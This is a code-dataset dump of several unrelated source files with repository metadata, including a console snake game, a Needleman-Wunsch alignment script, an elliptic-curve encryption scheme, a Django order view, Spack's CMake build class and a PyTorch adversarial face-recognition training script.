g_board[h[0]][h[1]] = DISPLAY_CHAR[HEAD]
##used to store apple in board
g_board[location[0]][location[1]] = DISPLAY_CHAR[APPLE]
return g_board
##function used to render the game
def gameRender() :
board = gameBoard()
top_and_bottom_border = "+" + "-" * width + "+"
print(top_and_bottom_border)
for x in range(height) :
line = "|"
for y in range(width) :
line += board[x][y]
line += "|"
print(line)
print (top_and_bottom_border)
##function that allows the user to play the game
def play_game() :
appleLocation()
gameRender()
while True :
#wait third of a second
time.sleep(0.3)
##this handles user input and assignes the new direction to the snake
u_in = kbfunc()
user_input = ""
if u_in != False :
user_input = u_in.decode().upper()
if user_input == INPUT_CHAR_UP and DIR != DOWN :
setDirection(UP)
elif user_input == INPUT_CHAR_DOWN and DIR != UP :
setDirection(DOWN)
elif user_input == INPUT_CHAR_RIGHT and DIR != LEFT :
setDirection(RIGHT)
elif user_input == INPUT_CHAR_LEFT and DIR != RIGHT :
setDirection(LEFT)
#checks whether snake crashed into itself
new_position = next_position(head(),DIR)
if new_position in snakeBody :
print("You died!")
break
##chacks whether the snake ate the apple
if new_position == location :
extendBody(new_position)
appleLocation()
takeStep(DIR)
gameRender()
##function to listen to key press
def kbfunc():
#this is boolean for whether the keyboard has bene hit
x = msvcrt.kbhit()
if x:
#getch acquires the character encoded in binary ASCII
ret = msvcrt.getch()
else:
ret = False
return ret
if __name__== "__main__":
initGame(10, 20)
play_game()
| 24.808743 | 115 | 0.618282 |
acdfa3987df389709687a04f5c180f55954cf14e | 671 | py | Python | scripts/pairwise_NW_alignment.py | glaunay/nox-analysis | 02ea77520e1f6a851973509f854c9c92c82137a6 | [
"Apache-2.0"
] | null | null | null | scripts/pairwise_NW_alignment.py | glaunay/nox-analysis | 02ea77520e1f6a851973509f854c9c92c82137a6 | [
"Apache-2.0"
] | null | null | null | scripts/pairwise_NW_alignment.py | glaunay/nox-analysis | 02ea77520e1f6a851973509f854c9c92c82137a6 | [
"Apache-2.0"
] | null | null | null | import sys, os
import pickle
import pyproteins.sequence.peptide as pep
import pyproteins.alignment.nw_custom as N
import pyproteins.alignment.scoringFunctions as scoringFunctions
try:
inp=sys.argv[1] #it's a pickled list of peptide pairs
except IndexError:
raise Exception("Give input")
try:
output=sys.argv[2]
except IndexError:
raise Exception("Give output")
list_pairs=pickle.load(open(inp,'rb'))
blosum = scoringFunctions.Needle().fScore
nw = N.nw(gapOpen=-10, gapExtend=-0.5, matchScorer=blosum)
results=[]
for pair in list_pairs:
aliResObj=nw.align(pair[0],pair[1])
results.append(aliResObj)
pickle.dump(results,open(output,"wb")) | 24.851852 | 64 | 0.748137 |
acdfa4b0db105734fccdaf180cd4e48cc89fcf4d | 4,062 | py | Python | elite/scheme.py | origamizyt/Elite | 5d279dd82f4a95541c475b0b0ac80995812b652a | [
"MIT"
] | null | null | null | elite/scheme.py | origamizyt/Elite | 5d279dd82f4a95541c475b0b0ac80995812b652a | [
"MIT"
] | null | null | null | elite/scheme.py | origamizyt/Elite | 5d279dd82f4a95541c475b0b0ac80995812b652a | [
"MIT"
] | null | null | null | '''
This module provides top-level encryption scheme that is already fully
integrated, ready for use. You can also define your own encryption schemes.
Predefined ones include secp256k1 with AES_EAX and secp384r1 with AES_GCM.
'''
from ecdsa.keys import BadSignatureError
from elite import EliteError
from .cipher import *
from .secret import *
from .utils import *
__all__ = ['getscheme', 'ECCScheme', 'P256k1AesEaxScheme', 'P384r1AesGcmScheme']
class EliteSchemeError(EliteError):
'General base class for scheme errors.'
class MissingRemoteKey(EliteSchemeError):
'Remote key is missing.'
class ECCScheme:
'Represents an ecc scheme.'
def __init__(self, kind: CurveKind, provider: CryptoProvider):
'Initializes a new instance with a private key and a crypto provider.'
self._kind = kind
self._privateKey = generate(kind)
self._publicKey = self._privateKey.publicKey()
self._remoteKey = None
self._provider = provider
def _check(self) -> None:
'Checks if the remote key is present.'
if self._remoteKey is None:
raise MissingRemoteKey
def exportBinaryKey(self) -> bytes:
'Exports the binary version of the public key.'
return self._publicKey.export().binary
def exportHexKey(self) -> str:
'Exports the hex version of the public key.'
return self._publicKey.export().hexadecimal
def importBinaryKey(self, key: bytes) -> bytes:
'Imports the binary version of the remote key.'
self._remoteKey = PublicKey.fromBinary(key, self._kind)
def importHexKey(self, key: str) -> str:
'Imports the hex version of the remote key.'
self._remoteKey = PublicKey.fromHex(key, self._kind)
@property
def privateKey(self) -> PrivateKey:
'Gets the private key.'
return self._privateKey
@property
def publicKey(self) -> PublicKey:
'Gets the public key.'
return self._publicKey
@property
def remoteKey(self) -> PublicKey:
'Gets the remote key.'
return self._remoteKey
def sign(self, data: bytes) -> bytes:
'Signs the data with remote key.'
return self._privateKey._key.sign(data)
def verify(self, data: bytes, signature: bytes) -> bool:
'Verified the data with local private key.'
self._check()
try:
self._remoteKey._key.verify(signature, data)
return True
except BadSignatureError:
return False
def encrypt(self, data: bytes) -> bytes:
'Encrypts the specific data with remote key.'
self._check()
ephemeral = generate(self._kind)
ephemeral_pub = ephemeral.publicKey()
secret = shared_secret(self._kind, ephemeral, self._remoteKey)
key, salt = derive_key(secret)
data = self._provider.encrypt(key, data)
return ephemeral_pub.export().binary + salt + data
def decrypt(self, data: bytes) -> bytes:
'Decrypts the specific data with local private key.'
ephemeral, salt, data = split_data(data, public_key_size(self._kind), get_salt_size())
ephemeral = PublicKey.fromBinary(ephemeral, self._kind)
secret = shared_secret(self._kind, self._privateKey, ephemeral)
key = derive_key(secret, salt)[0]
data = self._provider.decrypt(key, data)
return data
def secret(self) -> bytes:
'Gets the established shared secret.'
self._check()
return shared_secret(self._kind, self._privateKey, self._remoteKey)
class P256k1AesEaxScheme(ECCScheme):
'Secp256k1 with AES_EAX.'
def __init__(self):
'Initializes a new instance.'
super().__init__(CurveKind.CK_SECP256K1, AesEaxCryptoProvider())
class P384r1AesGcmScheme(ECCScheme):
'Secp384r1 with AES_GCM.'
def __init__(self):
'Initializes a new instance.'
super().__init__(CurveKind.CK_SECP384R1, AesGcmCryptoProvider())
def getscheme() -> ECCScheme:
'Gets the default scheme.'
return P256k1AesEaxScheme()
| 38.320755 | 94 | 0.673067 |
acdfa5d5a1e939606d690f3f09f15785a6c7bdaf | 4,783 | py | Python | shop/views/order.py | 2000-ion/TIDPP-Lab3 | 3fc97e6214b6e51f40df39f1692d4deec4bb0cc2 | [
"BSD-3-Clause"
] | 2,160 | 2016-01-24T05:08:59.000Z | 2022-03-31T12:15:30.000Z | shop/views/order.py | 2000-ion/TIDPP-Lab3 | 3fc97e6214b6e51f40df39f1692d4deec4bb0cc2 | [
"BSD-3-Clause"
] | 455 | 2016-01-29T22:41:33.000Z | 2022-03-23T08:28:01.000Z | shop/views/order.py | 2000-ion/TIDPP-Lab3 | 3fc97e6214b6e51f40df39f1692d4deec4bb0cc2 | [
"BSD-3-Clause"
] | 818 | 2016-02-01T15:09:07.000Z | 2022-03-28T19:52:26.000Z | from django.utils import timezone
from django.views.decorators.cache import never_cache
from django.utils.translation import gettext_lazy as _
from rest_framework import generics, mixins
from rest_framework.exceptions import NotFound, MethodNotAllowed
from rest_framework.pagination import LimitOffsetPagination
from rest_framework.renderers import BrowsableAPIRenderer
from rest_framework.exceptions import PermissionDenied
from rest_framework.permissions import BasePermission
from shop.rest.money import JSONRenderer
from shop.rest.renderers import CMSPageRenderer
from shop.serializers.order import OrderListSerializer, OrderDetailSerializer
from shop.models.order import OrderModel
class OrderPagination(LimitOffsetPagination):
default_limit = 15
template = 'shop/templatetags/paginator.html'
class OrderPermission(BasePermission):
"""
Allow access to a given Order if the user is entitled to.
"""
def has_permission(self, request, view):
if view.many and request.customer.is_visitor:
detail = _("Only signed in customers can view their list of orders.")
raise PermissionDenied(detail=detail)
return True
def has_object_permission(self, request, view, order):
if request.user.is_authenticated:
return order.customer.pk == request.user.pk
if order.secret and order.secret == view.kwargs.get('secret'):
return True
detail = _("This order does not belong to you.")
raise PermissionDenied(detail=detail)
class OrderView(mixins.ListModelMixin, mixins.RetrieveModelMixin, mixins.UpdateModelMixin,
generics.GenericAPIView):
"""
Base View class to render the fulfilled orders for the current user.
"""
renderer_classes = [CMSPageRenderer, JSONRenderer, BrowsableAPIRenderer]
list_serializer_class = OrderListSerializer
detail_serializer_class = OrderDetailSerializer
pagination_class = OrderPagination
permission_classes = [OrderPermission]
lookup_field = lookup_url_kwarg = 'slug'
many = True
last_order_lapse = timezone.timedelta(minutes=15)
def get_queryset(self):
queryset = OrderModel.objects.all()
if not self.request.customer.is_visitor:
queryset = queryset.filter(customer=self.request.customer).order_by('-updated_at')
return queryset
def get_serializer_class(self):
if self.many:
return self.list_serializer_class
return self.detail_serializer_class
def get_renderer_context(self):
renderer_context = super().get_renderer_context()
if self.request.accepted_renderer.format == 'html':
renderer_context.update(many=self.many)
if not self.many:
# add an extra ance to the breadcrumb to show the order number
renderer_context.update(
is_last_order = self.is_last(),
extra_ance=self.get_object().get_number(),
)
return renderer_context
def is_last(self):
"""
Returns ``True`` if the given order is considered as the last order for its customer.
This information may be used to distinguish between a "thank you" and a normal detail view.
"""
assert self.many is False, "This method can be called for detail views only"
lapse = timezone.now() - self.last_order_lapse
current_order = self.get_object()
last_order = self.get_queryset().first()
return current_order.id == last_order.id and current_order.created_at > lapse
@property
def allowed_methods(self):
"""Restrict method "POST" only on the detail view"""
allowed_methods = self._allowed_methods()
if self.many:
allowed_methods.remove('POST')
return allowed_methods
@never_cache
def get(self, request, *args, **kwargs):
if self.many:
return self.list(request, *args, **kwargs)
return self.retrieve(request, *args, **kwargs)
def post(self, request, *args, **kwargs):
if self.many:
raise MethodNotAllowed("Method POST is not allowed on Order List View")
self.update(request, *args, **kwargs)
return self.retrieve(request, *args, **kwargs)
def list(self, request, *args, **kwargs):
try:
return super().list(request, *args, **kwargs)
except OrderModel.DoesNotExist:
raise NotFound("No orders have been found for the current user.")
def retrieve(self, request, *args, **kwargs):
try:
return super().retrieve(request, *args, **kwargs)
except OrderModel.DoesNotExist:
raise NotFound("No order has been found for the current user.")
| 40.193277 | 99 | 0.687017 |
acdfa614cf7017e1903bd5216b641d281b420129 | 3,319 | bzl | Python | crate_universe/private/srcs.bzl | ttiurani/rules_rust | 2fa92e5a139c7cb64d606718273e295ce756f0f3 | [
"Apache-2.0"
] | 1 | 2017-06-12T02:10:48.000Z | 2017-06-12T02:10:48.000Z | crate_universe/private/srcs.bzl | ttiurani/rules_rust | 2fa92e5a139c7cb64d606718273e295ce756f0f3 | [
"Apache-2.0"
] | null | null | null | crate_universe/private/srcs.bzl | ttiurani/rules_rust | 2fa92e5a139c7cb64d606718273e295ce756f0f3 | [
"Apache-2.0"
] | null | null | null | """A generate file containing all source files used to produce `cargo-bazel`"""
# Each source file is tracked as a target so the `cargo_bootstrap_repository`
# rule will know to automatically rebuild if any of the sources changed.
CARGO_BAZEL_SRCS = [
"@rules_rust//crate_universe:src/cli.rs",
"@rules_rust//crate_universe:src/cli/generate.rs",
"@rules_rust//crate_universe:src/cli/query.rs",
"@rules_rust//crate_universe:src/cli/splice.rs",
"@rules_rust//crate_universe:src/cli/vendor.rs",
"@rules_rust//crate_universe:src/config.rs",
"@rules_rust//crate_universe:src/context.rs",
"@rules_rust//crate_universe:src/context/crate_context.rs",
"@rules_rust//crate_universe:src/context/platforms.rs",
"@rules_rust//crate_universe:src/lib.rs",
"@rules_rust//crate_universe:src/lockfile.rs",
"@rules_rust//crate_universe:src/main.rs",
"@rules_rust//crate_universe:src/metadata.rs",
"@rules_rust//crate_universe:src/metadata/dependency.rs",
"@rules_rust//crate_universe:src/metadata/metadata_annotation.rs",
"@rules_rust//crate_universe:src/rendering.rs",
"@rules_rust//crate_universe:src/rendering/template_engine.rs",
"@rules_rust//crate_universe:src/rendering/templates/crate_build_file.j2",
"@rules_rust//crate_universe:src/rendering/templates/module_build_file.j2",
"@rules_rust//crate_universe:src/rendering/templates/module_bzl.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/crate/aliases.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/crate/binary.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/crate/build_script.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/crate/common_attrs.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/crate/deps.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/crate/library.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/crate/proc_macro.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/header.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/module/aliases_map.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/module/deps_map.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/module/repo_git.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/module/repo_http.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/starlark/glob.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/starlark/selectable_dict.j2",
"@rules_rust//crate_universe:src/rendering/templates/partials/starlark/selectable_list.j2",
"@rules_rust//crate_universe:src/rendering/templates/vendor_module.j2",
"@rules_rust//crate_universe:src/splicing.rs",
"@rules_rust//crate_universe:src/splicing/cargo_config.rs",
"@rules_rust//crate_universe:src/splicing/splicer.rs",
"@rules_rust//crate_universe:src/test.rs",
"@rules_rust//crate_universe:src/utils.rs",
"@rules_rust//crate_universe:src/utils/starlark.rs",
"@rules_rust//crate_universe:src/utils/starlark/glob.rs",
"@rules_rust//crate_universe:src/utils/starlark/label.rs",
"@rules_rust//crate_universe:src/utils/starlark/select.rs",
]
| 63.826923 | 95 | 0.767099 |
acdfa66ea2e5a43ba5d96f4be88d32af27ce5f82 | 9,851 | py | Python | lib/spack/spack/build_systems/cmake.py | nkianggiss/spack | 3477d3375142a30f5714bb5966a6d8bb22c33c06 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2018-08-20T06:55:11.000Z | 2018-08-20T06:55:11.000Z | lib/spack/spack/build_systems/cmake.py | nkianggiss/spack | 3477d3375142a30f5714bb5966a6d8bb22c33c06 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2019-04-29T22:36:27.000Z | 2019-04-30T12:51:38.000Z | lib/spack/spack/build_systems/cmake.py | nkianggiss/spack | 3477d3375142a30f5714bb5966a6d8bb22c33c06 | [
"ECL-2.0",
"Apache-2.0",
"MIT"
] | 1 | 2020-03-12T19:27:17.000Z | 2020-03-12T19:27:17.000Z | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import inspect
import os
import platform
import spack.build_environment
from llnl.util.filesystem import working_dir
from spack.util.environment import filter_system_paths
from spack.directives import depends_on, variant
from spack.package import PackageBase, InstallError, run_after
class CMakePackage(PackageBase):
"""Specialized class for packages built using CMake
For more information on the CMake build system, see:
https://cmake.org/cmake/help/latest/
This class provides three phases that can be overridden:
1. :py:meth:`~.CMakePackage.cmake`
2. :py:meth:`~.CMakePackage.build`
3. :py:meth:`~.CMakePackage.install`
They all have sensible defaults and for many packages the only thing
necessary will be to override :py:meth:`~.CMakePackage.cmake_args`.
For a finer tuning you may also override:
+-----------------------------------------------+--------------------+
| **Method** | **Purpose** |
+===============================================+====================+
| :py:meth:`~.CMakePackage.root_cmakelists_dir` | Location of the |
| | root CMakeLists.txt|
+-----------------------------------------------+--------------------+
| :py:meth:`~.CMakePackage.build_directory` | Directory where to |
| | build the package |
+-----------------------------------------------+--------------------+
"""
#: Phases of a CMake package
phases = ['cmake', 'build', 'install']
#: This attribute is used in UI queries that need to know the build
#: system base class
build_system_class = 'CMakePackage'
build_targets = []
install_targets = ['install']
build_time_test_callbacks = ['check']
#: The build system generator to use.
#:
#: See ``cmake --help`` for a list of valid generators.
#: Currently, "Unix Makefiles" and "Ninja" are the only generators
#: that Spack supports. Defaults to "Unix Makefiles".
#:
#: See https://cmake.org/cmake/help/latest/manual/cmake-generators.7.html
#: for more information.
generator = 'Unix Makefiles'
# https://cmake.org/cmake/help/latest/variable/CMAKE_BUILD_TYPE.html
variant('build_type', default='RelWithDebInfo',
description='CMake build type',
values=('Debug', 'Release', 'RelWithDebInfo', 'MinSizeRel'))
depends_on('cmake', type='build')
@property
def archive_files(self):
"""Files to archive for packages based on CMake"""
return [os.path.join(self.build_directory, 'CMakeCache.txt')]
@property
def root_cmakelists_dir(self):
"""The relative path to the directory containing CMakeLists.txt
This path is relative to the root of the extracted tarball,
not to the ``build_directory``. Defaults to the current directory.
:return: directory containing CMakeLists.txt
"""
return self.stage.source_path
@property
def std_cmake_args(self):
"""Standard cmake arguments provided as a property for
convenience of package writers
:return: standard cmake arguments
"""
# standard CMake arguments
std_cmake_args = CMakePackage._std_args(self)
std_cmake_args += getattr(self, 'cmake_flag_args', [])
return std_cmake_args
@staticmethod
def _std_args(pkg):
"""Computes the standard cmake arguments for a generic package"""
try:
generator = pkg.generator
except AttributeError:
generator = 'Unix Makefiles'
# Make sure a valid generator was chosen
valid_generators = ['Unix Makefiles', 'Ninja']
if generator not in valid_generators:
msg = "Invalid CMake generator: '{0}'\n".format(generator)
msg += "CMakePackage currently supports the following "
msg += "generators: '{0}'".format("', '".join(valid_generators))
raise InstallError(msg)
try:
build_type = pkg.spec.variants['build_type'].value
except KeyError:
build_type = 'RelWithDebInfo'
args = [
'-G', generator,
'-DCMAKE_INSTALL_PREFIX:PATH={0}'.format(pkg.prefix),
'-DCMAKE_BUILD_TYPE:STRING={0}'.format(build_type),
'-DCMAKE_VERBOSE_MAKEFILE:BOOL=ON'
]
if platform.mac_ver()[0]:
args.extend([
'-DCMAKE_FIND_FRAMEWORK:STRING=LAST',
'-DCMAKE_FIND_APPBUNDLE:STRING=LAST'
])
# Set up CMake rpath
args.append('-DCMAKE_INSTALL_RPATH_USE_LINK_PATH:BOOL=FALSE')
rpaths = ';'.join(spack.build_environment.get_rpaths(pkg))
args.append('-DCMAKE_INSTALL_RPATH:STRING={0}'.format(rpaths))
# CMake's find_package() looks in CMAKE_PREFIX_PATH first, help CMake
# to find immediate link dependencies in right places:
deps = [d.prefix for d in
pkg.spec.dependencies(deptype=('build', 'link'))]
deps = filter_system_paths(deps)
args.append('-DCMAKE_PREFIX_PATH:STRING={0}'.format(';'.join(deps)))
return args
def flags_to_build_system_args(self, flags):
"""Produces a list of all command line arguments to pass the specified
compiler flags to cmake. Note CMAKE does not have a cppflags option,
so cppflags will be added to cflags, cxxflags, and fflags to mimic the
behavior in other tools."""
# Has to be dynamic attribute due to caching
setattr(self, 'cmake_flag_args', [])
flag_string = '-DCMAKE_{0}_FLAGS={1}'
langs = {'C': 'c', 'CXX': 'cxx', 'Fortran': 'f'}
# Handle language compiler flags
for lang, pre in langs.items():
flag = pre + 'flags'
# cmake has no explicit cppflags support -> add it to all langs
lang_flags = ' '.join(flags.get(flag, []) + flags.get('cppflags',
[]))
if lang_flags:
self.cmake_flag_args.append(flag_string.format(lang,
lang_flags))
# Cmake has different linker arguments for different build types.
# We specify for each of them.
if flags['ldflags']:
ldflags = ' '.join(flags['ldflags'])
ld_string = '-DCMAKE_{0}_LINKER_FLAGS={1}'
# cmake has separate linker arguments for types of builds.
for type in ['EXE', 'MODULE', 'SHARED', 'STATIC']:
self.cmake_flag_args.append(ld_string.format(type, ldflags))
# CMake has libs options separated by language. Apply ours to each.
if flags['ldlibs']:
libs_flags = ' '.join(flags['ldlibs'])
libs_string = '-DCMAKE_{0}_STANDARD_LIBRARIES={1}'
for lang in langs:
self.cmake_flag_args.append(libs_string.format(lang,
libs_flags))
@property
def build_directory(self):
"""Returns the directory to use when building the package
:return: directory where to build the package
"""
return os.path.join(self.stage.source_path, 'spack-build')
def cmake_args(self):
"""Produces a list containing all the arguments that must be passed to
cmake, except:
* CMAKE_INSTALL_PREFIX
* CMAKE_BUILD_TYPE
which will be set automatically.
:return: list of arguments for cmake
"""
return []
def cmake(self, spec, prefix):
"""Runs ``cmake`` in the build directory"""
options = [os.path.abspath(self.root_cmakelists_dir)]
options += self.std_cmake_args
options += self.cmake_args()
with working_dir(self.build_directory, create=True):
inspect.getmodule(self).cmake(*options)
def build(self, spec, prefix):
"""Make the build targets"""
with working_dir(self.build_directory):
if self.generator == 'Unix Makefiles':
inspect.getmodule(self).make(*self.build_targets)
elif self.generator == 'Ninja':
inspect.getmodule(self).ninja(*self.build_targets)
def install(self, spec, prefix):
"""Make the install targets"""
with working_dir(self.build_directory):
if self.generator == 'Unix Makefiles':
inspect.getmodule(self).make(*self.install_targets)
elif self.generator == 'Ninja':
inspect.getmodule(self).ninja(*self.install_targets)
run_after('build')(PackageBase._run_default_build_time_test_callbacks)
def check(self):
"""Searches the CMake-generated Makefile for the target ``test``
and runs it if found.
"""
with working_dir(self.build_directory):
if self.generator == 'Unix Makefiles':
self._if_make_target_execute('test',
jobs_env='CTEST_PARALLEL_LEVEL')
self._if_make_target_execute('check')
elif self.generator == 'Ninja':
self._if_ninja_target_execute('test',
jobs_env='CTEST_PARALLEL_LEVEL')
self._if_ninja_target_execute('check')
# Check that self.prefix is there after installation
run_after('install')(PackageBase.sanity_check_prefix)
| 39.562249 | 78 | 0.587453 |
acdfa6a302f587b880a364dfdcfc570bbfad9118 | 9,509 | py | Python | train.py | amands97/adverserialSphereFace | 91832c4af6768bfa4b116646d09135d98ce727f6 | [
"MIT"
] | null | null | null | train.py | amands97/adverserialSphereFace | 91832c4af6768bfa4b116646d09135d98ce727f6 | [
"MIT"
] | null | null | null | train.py | amands97/adverserialSphereFace | 91832c4af6768bfa4b116646d09135d98ce727f6 | [
"MIT"
] | null | null | null | # CUDA_VISIBLE_DEVICES=2 python train.py --datase CASIA-WebFace.zip --bs 256
from __future__ import print_function
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.autograd import Variable
torch.backends.cudnn.bencmark = True
import os,sys
import cv2
import random,datetime
import argparse
import numpy as np
np.warnings.filterwarnings('ignore')
from dataset import ImageDataset
from matlab_cp2tform import get_similarity_transform_for_cv2
import net_sphere
import adversary
from gumbel import gumbel_softmax
from torch.nn.functional import conv2d # for the kernel
from torch.utils.tensorboard import SummaryWriter
parser = argparse.ArgumentParser(description='PyTorch sphereface')
parser.add_argument('--net','-n', default='sphere20a', type=str)
parser.add_argument('--dataset', default='../../dataset/face/casia/casia.zip', type=str)
parser.add_argument('--lr', default=0.1, type=float, help='learning rate')
parser.add_argument('--bs', default=256, type=int, help='')
parser.add_argument('--checkpoint', default=-1, type=int, help='if use checkpoint then mention the number, otherwise training from scratch')
args = parser.parse_args()
use_cuda = torch.cuda.is_available()
writer = SummaryWriter()
n_iter = 0
def alignment(src_img,src_pts):
of = 2
ref_pts = [ [30.2946+of, 51.6963+of],[65.5318+of, 51.5014+of],
[48.0252+of, 71.7366+of],[33.5493+of, 92.3655+of],[62.7299+of, 92.2041+of] ]
crop_size = (96+of*2, 112+of*2)
s = np.array(src_pts).astype(np.float32)
r = np.array(ref_pts).astype(np.float32)
tfm = get_similarity_transform_for_cv2(s, r)
face_img = cv2.warpAffine(src_img, tfm, crop_size)
return face_img
def dataset_load(name,filename,pindex,cacheobj,zfile):
position = filename.rfind('.zip:')
zipfilename = filename[0:position+4]
nameinzip = filename[position+5:]
split = nameinzip.split('\t')
nameinzip = split[0]
classid = int(split[1])
src_pts = []
for i in range(5):
src_pts.append([int(split[2*i+2]),int(split[2*i+3])])
data = np.frombuffer(zfile.read(nameinzip),np.uint8)
img = cv2.imdecode(data,1)
img = alignment(img,src_pts)
if ':train' in name:
if random.random()>0.5: img = cv2.flip(img,1)
if random.random()>0.5:
rx = random.randint(0,2*2)
ry = random.randint(0,2*2)
img = img[ry:ry+112,rx:rx+96,:]
else:
img = img[2:2+112,2:2+96,:]
else:
img = img[2:2+112,2:2+96,:]
img = img.transpose(2, 0, 1).reshape((1,3,112,96))
img = ( img - 127.5 ) / 128.0
label = np.zeros((1,1),np.float32)
label[0,0] = classid
return (img,label)
def printoneline(*argv):
s = ''
for arg in argv: s += str(arg) + ' '
s = s[:-1]
sys.stdout.write('\r'+s)
sys.stdout.flush()
def save_model(model,filename):
state = model.state_dict()
for key in state: state[key] = state[key].clone().cpu()
torch.save(state, filename)
def dt():
return datetime.datetime.now().strftime('%H:%M:%S')
def getKernel():
# https://discuss.pytorch.org/t/setting-custom-kernel-for-cnn-in-pytorch/27176/2
kernel = torch.ones((3,3))
kernel[1, 1] = -8
kernel = kernel/-8
# b, c, h, w = x.shape (hard coded here)
b, c, h, w = (1,1, 7, 6)
kernel = kernel.type(torch.FloatTensor)
kernel = kernel.repeat(c, 1, 1, 1)
return kernel
def train(epoch,args):
featureNet.train()
maskNet.train()
fcNet.train()
train_loss = 0
classification_loss = 0
correct = 0
total = 0
batch_idx = 0
ds = ImageDataset(args.dataset,dataset_load,'data/casia_landmark.txt',name=args.net+':train',
bs=args.bs,shuffle=True,nthread=6,imagesize=128)
global n_iter
while True:
if batch_idx % 100 == 0:
print(batch_idx)
print(batch_idx)
n_iter += 1
img,label = ds.get()
if img is None: break
inputs = torch.from_numpy(img).float()
targets = torch.from_numpy(label[:,0]).long()
if use_cuda: inputs, targets = inputs.cuda(), targets.cuda()
optimizerMask.zero_grad()
inputs, targets = Variable(inputs), Variable(targets)
features = featureNet(inputs)
mask = maskNet(features)
mask = gumbel_softmax(mask)
# print(mask.size())
maskedFeatures = torch.mul(mask, features)
# print(features.shape, mask.shape, maskedFeatures.shape)
outputs = fcNet(maskedFeatures)
outputs1 = outputs[0] # 0=cos_theta 1=phi_theta
_, predicted = torch.max(outputs1.data, 1)
total += targets.size(0)
correct += predicted.eq(targets.data).cpu().sum()
# training the advNet:
lossAdv = criterion(outputs, targets)
# print(conv2d(mask, laplacianKernel, stride=1, groups=1).size())
lossCompact = torch.sum(conv2d(mask, laplacianKernel, stride=1, groups=1))
# lossSize #L1 norm of the mask to make the mask sparse.
if use_cuda:
lossSize = F.l1_loss(mask, target=torch.ones(mask.size()).cuda(), size_average = False)
else:
lossSize = F.l1_loss(mask, target=torch.ones(mask.size()), size_average = False)
# print("advnet:", - criterion2(outputs1, targets).data/10, lossCompact.data/1000000, lossSize.data/10000)
writer.add_scalar('Loss/adv-classification', - criterion2(outputs1, targets)/100 , n_iter)
writer.add_scalar('Loss/adv-compactness', lossCompact/1000000, n_iter)
writer.add_scalar('Loss/adv-size', lossSize/10000, n_iter)
loss = - criterion2(outputs1, targets)/100 + lossCompact/1000000 + lossSize/10000
writer.add_scalar('Accuracy/adv-totalLoss', loss, n_iter)
lossd = loss.data
loss.backward(retain_graph=True)
optimizerMask.step()
optimizerFC.zero_grad()
lossC = criterion(outputs, targets)
lossClassification = lossC.data
lossC.backward()
optimizerFC.step()
classification_loss += lossClassification
train_loss += loss.data
# print("classification loss:", classification_loss / (batch_idx + 1))
writer.add_scalar('Loss/classn-loss', classification_loss/(batch_idx + 1), n_iter)
writer.add_scalar('Loss/adv-avgloss', train_loss/(batch_idx + 1), n_iter)
# printoneline(dt(),'Te=%d Loss=%.4f | AccT=%.4f%% (%d/%d) %.4f %.2f %d\n'
# % (epoch,train_loss/(batch_idx+1), 100.0*correct/total, correct, total,
# lossd, criterion.lamb, criterion.it))
writer.add_scalar('Accuracy/classification', 100* correct/total, n_iter)
# writer.add_scalar
writer.add_scalar('Accuracy/correct', correct, n_iter)
batch_idx += 1
# break
print('')
if args.checkpoint == -1:
featureNet = getattr(net_sphere,args.net)()
featureNet.load_state_dict(torch.load('model/sphere20a_20171020.pth'))
maskNet = getattr(adversary, "MaskMan")(512)
fcNet = getattr(net_sphere, "fclayers")()
pretrainedDict = torch.load('model/sphere20a_20171020.pth')
fcDict = {k: pretrainedDict[k] for k in pretrainedDict if k in fcNet.state_dict()}
fcNet.load_state_dict(fcDict)
laplacianKernel = getKernel()
else:
featureNet = getattr(net_sphere,args.net)()
featureNet.load_state_dict(torch.load('saved_models_ce/featureNet_' + str(args.checkpoint) + '.pth'))
maskNet = getattr(adversary, "MaskMan")(512)
maskNet.load_state_dict(torch.load('saved_models_ce/maskNet_' + str(args.checkpoint) + '.pth'))
fcNet = getattr(net_sphere, "fclayers")()
# pretrainedDict = torch.load('model/sphere20a_20171020.pth')
# fcDict = {k: pretrainedDict[k] for k in pretrainedDict if k in fcNet.state_dict()}
fcNet.load_state_dict(torch.load('saved_models_ce/fcNet_'+ str(args.checkpoint)+ '.pth'))
laplacianKernel = getKernel()
# print(advNet)
# net = getattr(net_sphere, "newNetwork")(net1, advNet)
if use_cuda:
featureNet.cuda()
maskNet.cuda()
fcNet.cuda()
laplacianKernel = laplacianKernel.cuda()
criterion = net_sphere.AngleLoss()
optimizerFC = optim.SGD(list(featureNet.parameters()) + list(fcNet.parameters()), lr=args.lr, momentum=0.9, weight_decay=5e-4)
# optimizerFeature = optim.SGD(featureNet.parameters(), lr=args.lr, momentum=0.9, weight_decay=5e-4)
optimizerMask = optim.SGD(maskNet.parameters(), lr = args.lr/1000, momentum=0.9, weight_decay=5e-4)
criterion2 = torch.nn.CrossEntropyLoss()
print('start: time={}'.format(dt()))
for epoch in range(0, 50):
if epoch in [0,10,15,18]:
if epoch!=0: args.lr *= 0.1
optimizerFC = optim.SGD(list(featureNet.parameters()) + list(fcNet.parameters()), lr=args.lr, momentum=0.9, weight_decay=5e-4)
# optimizerFeature = optim.SGD(featureNet.parameters(), lr=args.lr, momentum=0.9, weight_decay=5e-4)
optimizerMask = optim.SGD(maskNet.parameters(), lr = args.lr/10000, momentum=0.9, weight_decay=5e-4)
# slowed the lr even more
if args.checkpoint >= epoch:
continue
# optimizerFC = optim.SGD(fcNet.parameters(), lr=args.lr, momentum=0.9, weight_decay=5e-4)
train(epoch,args)
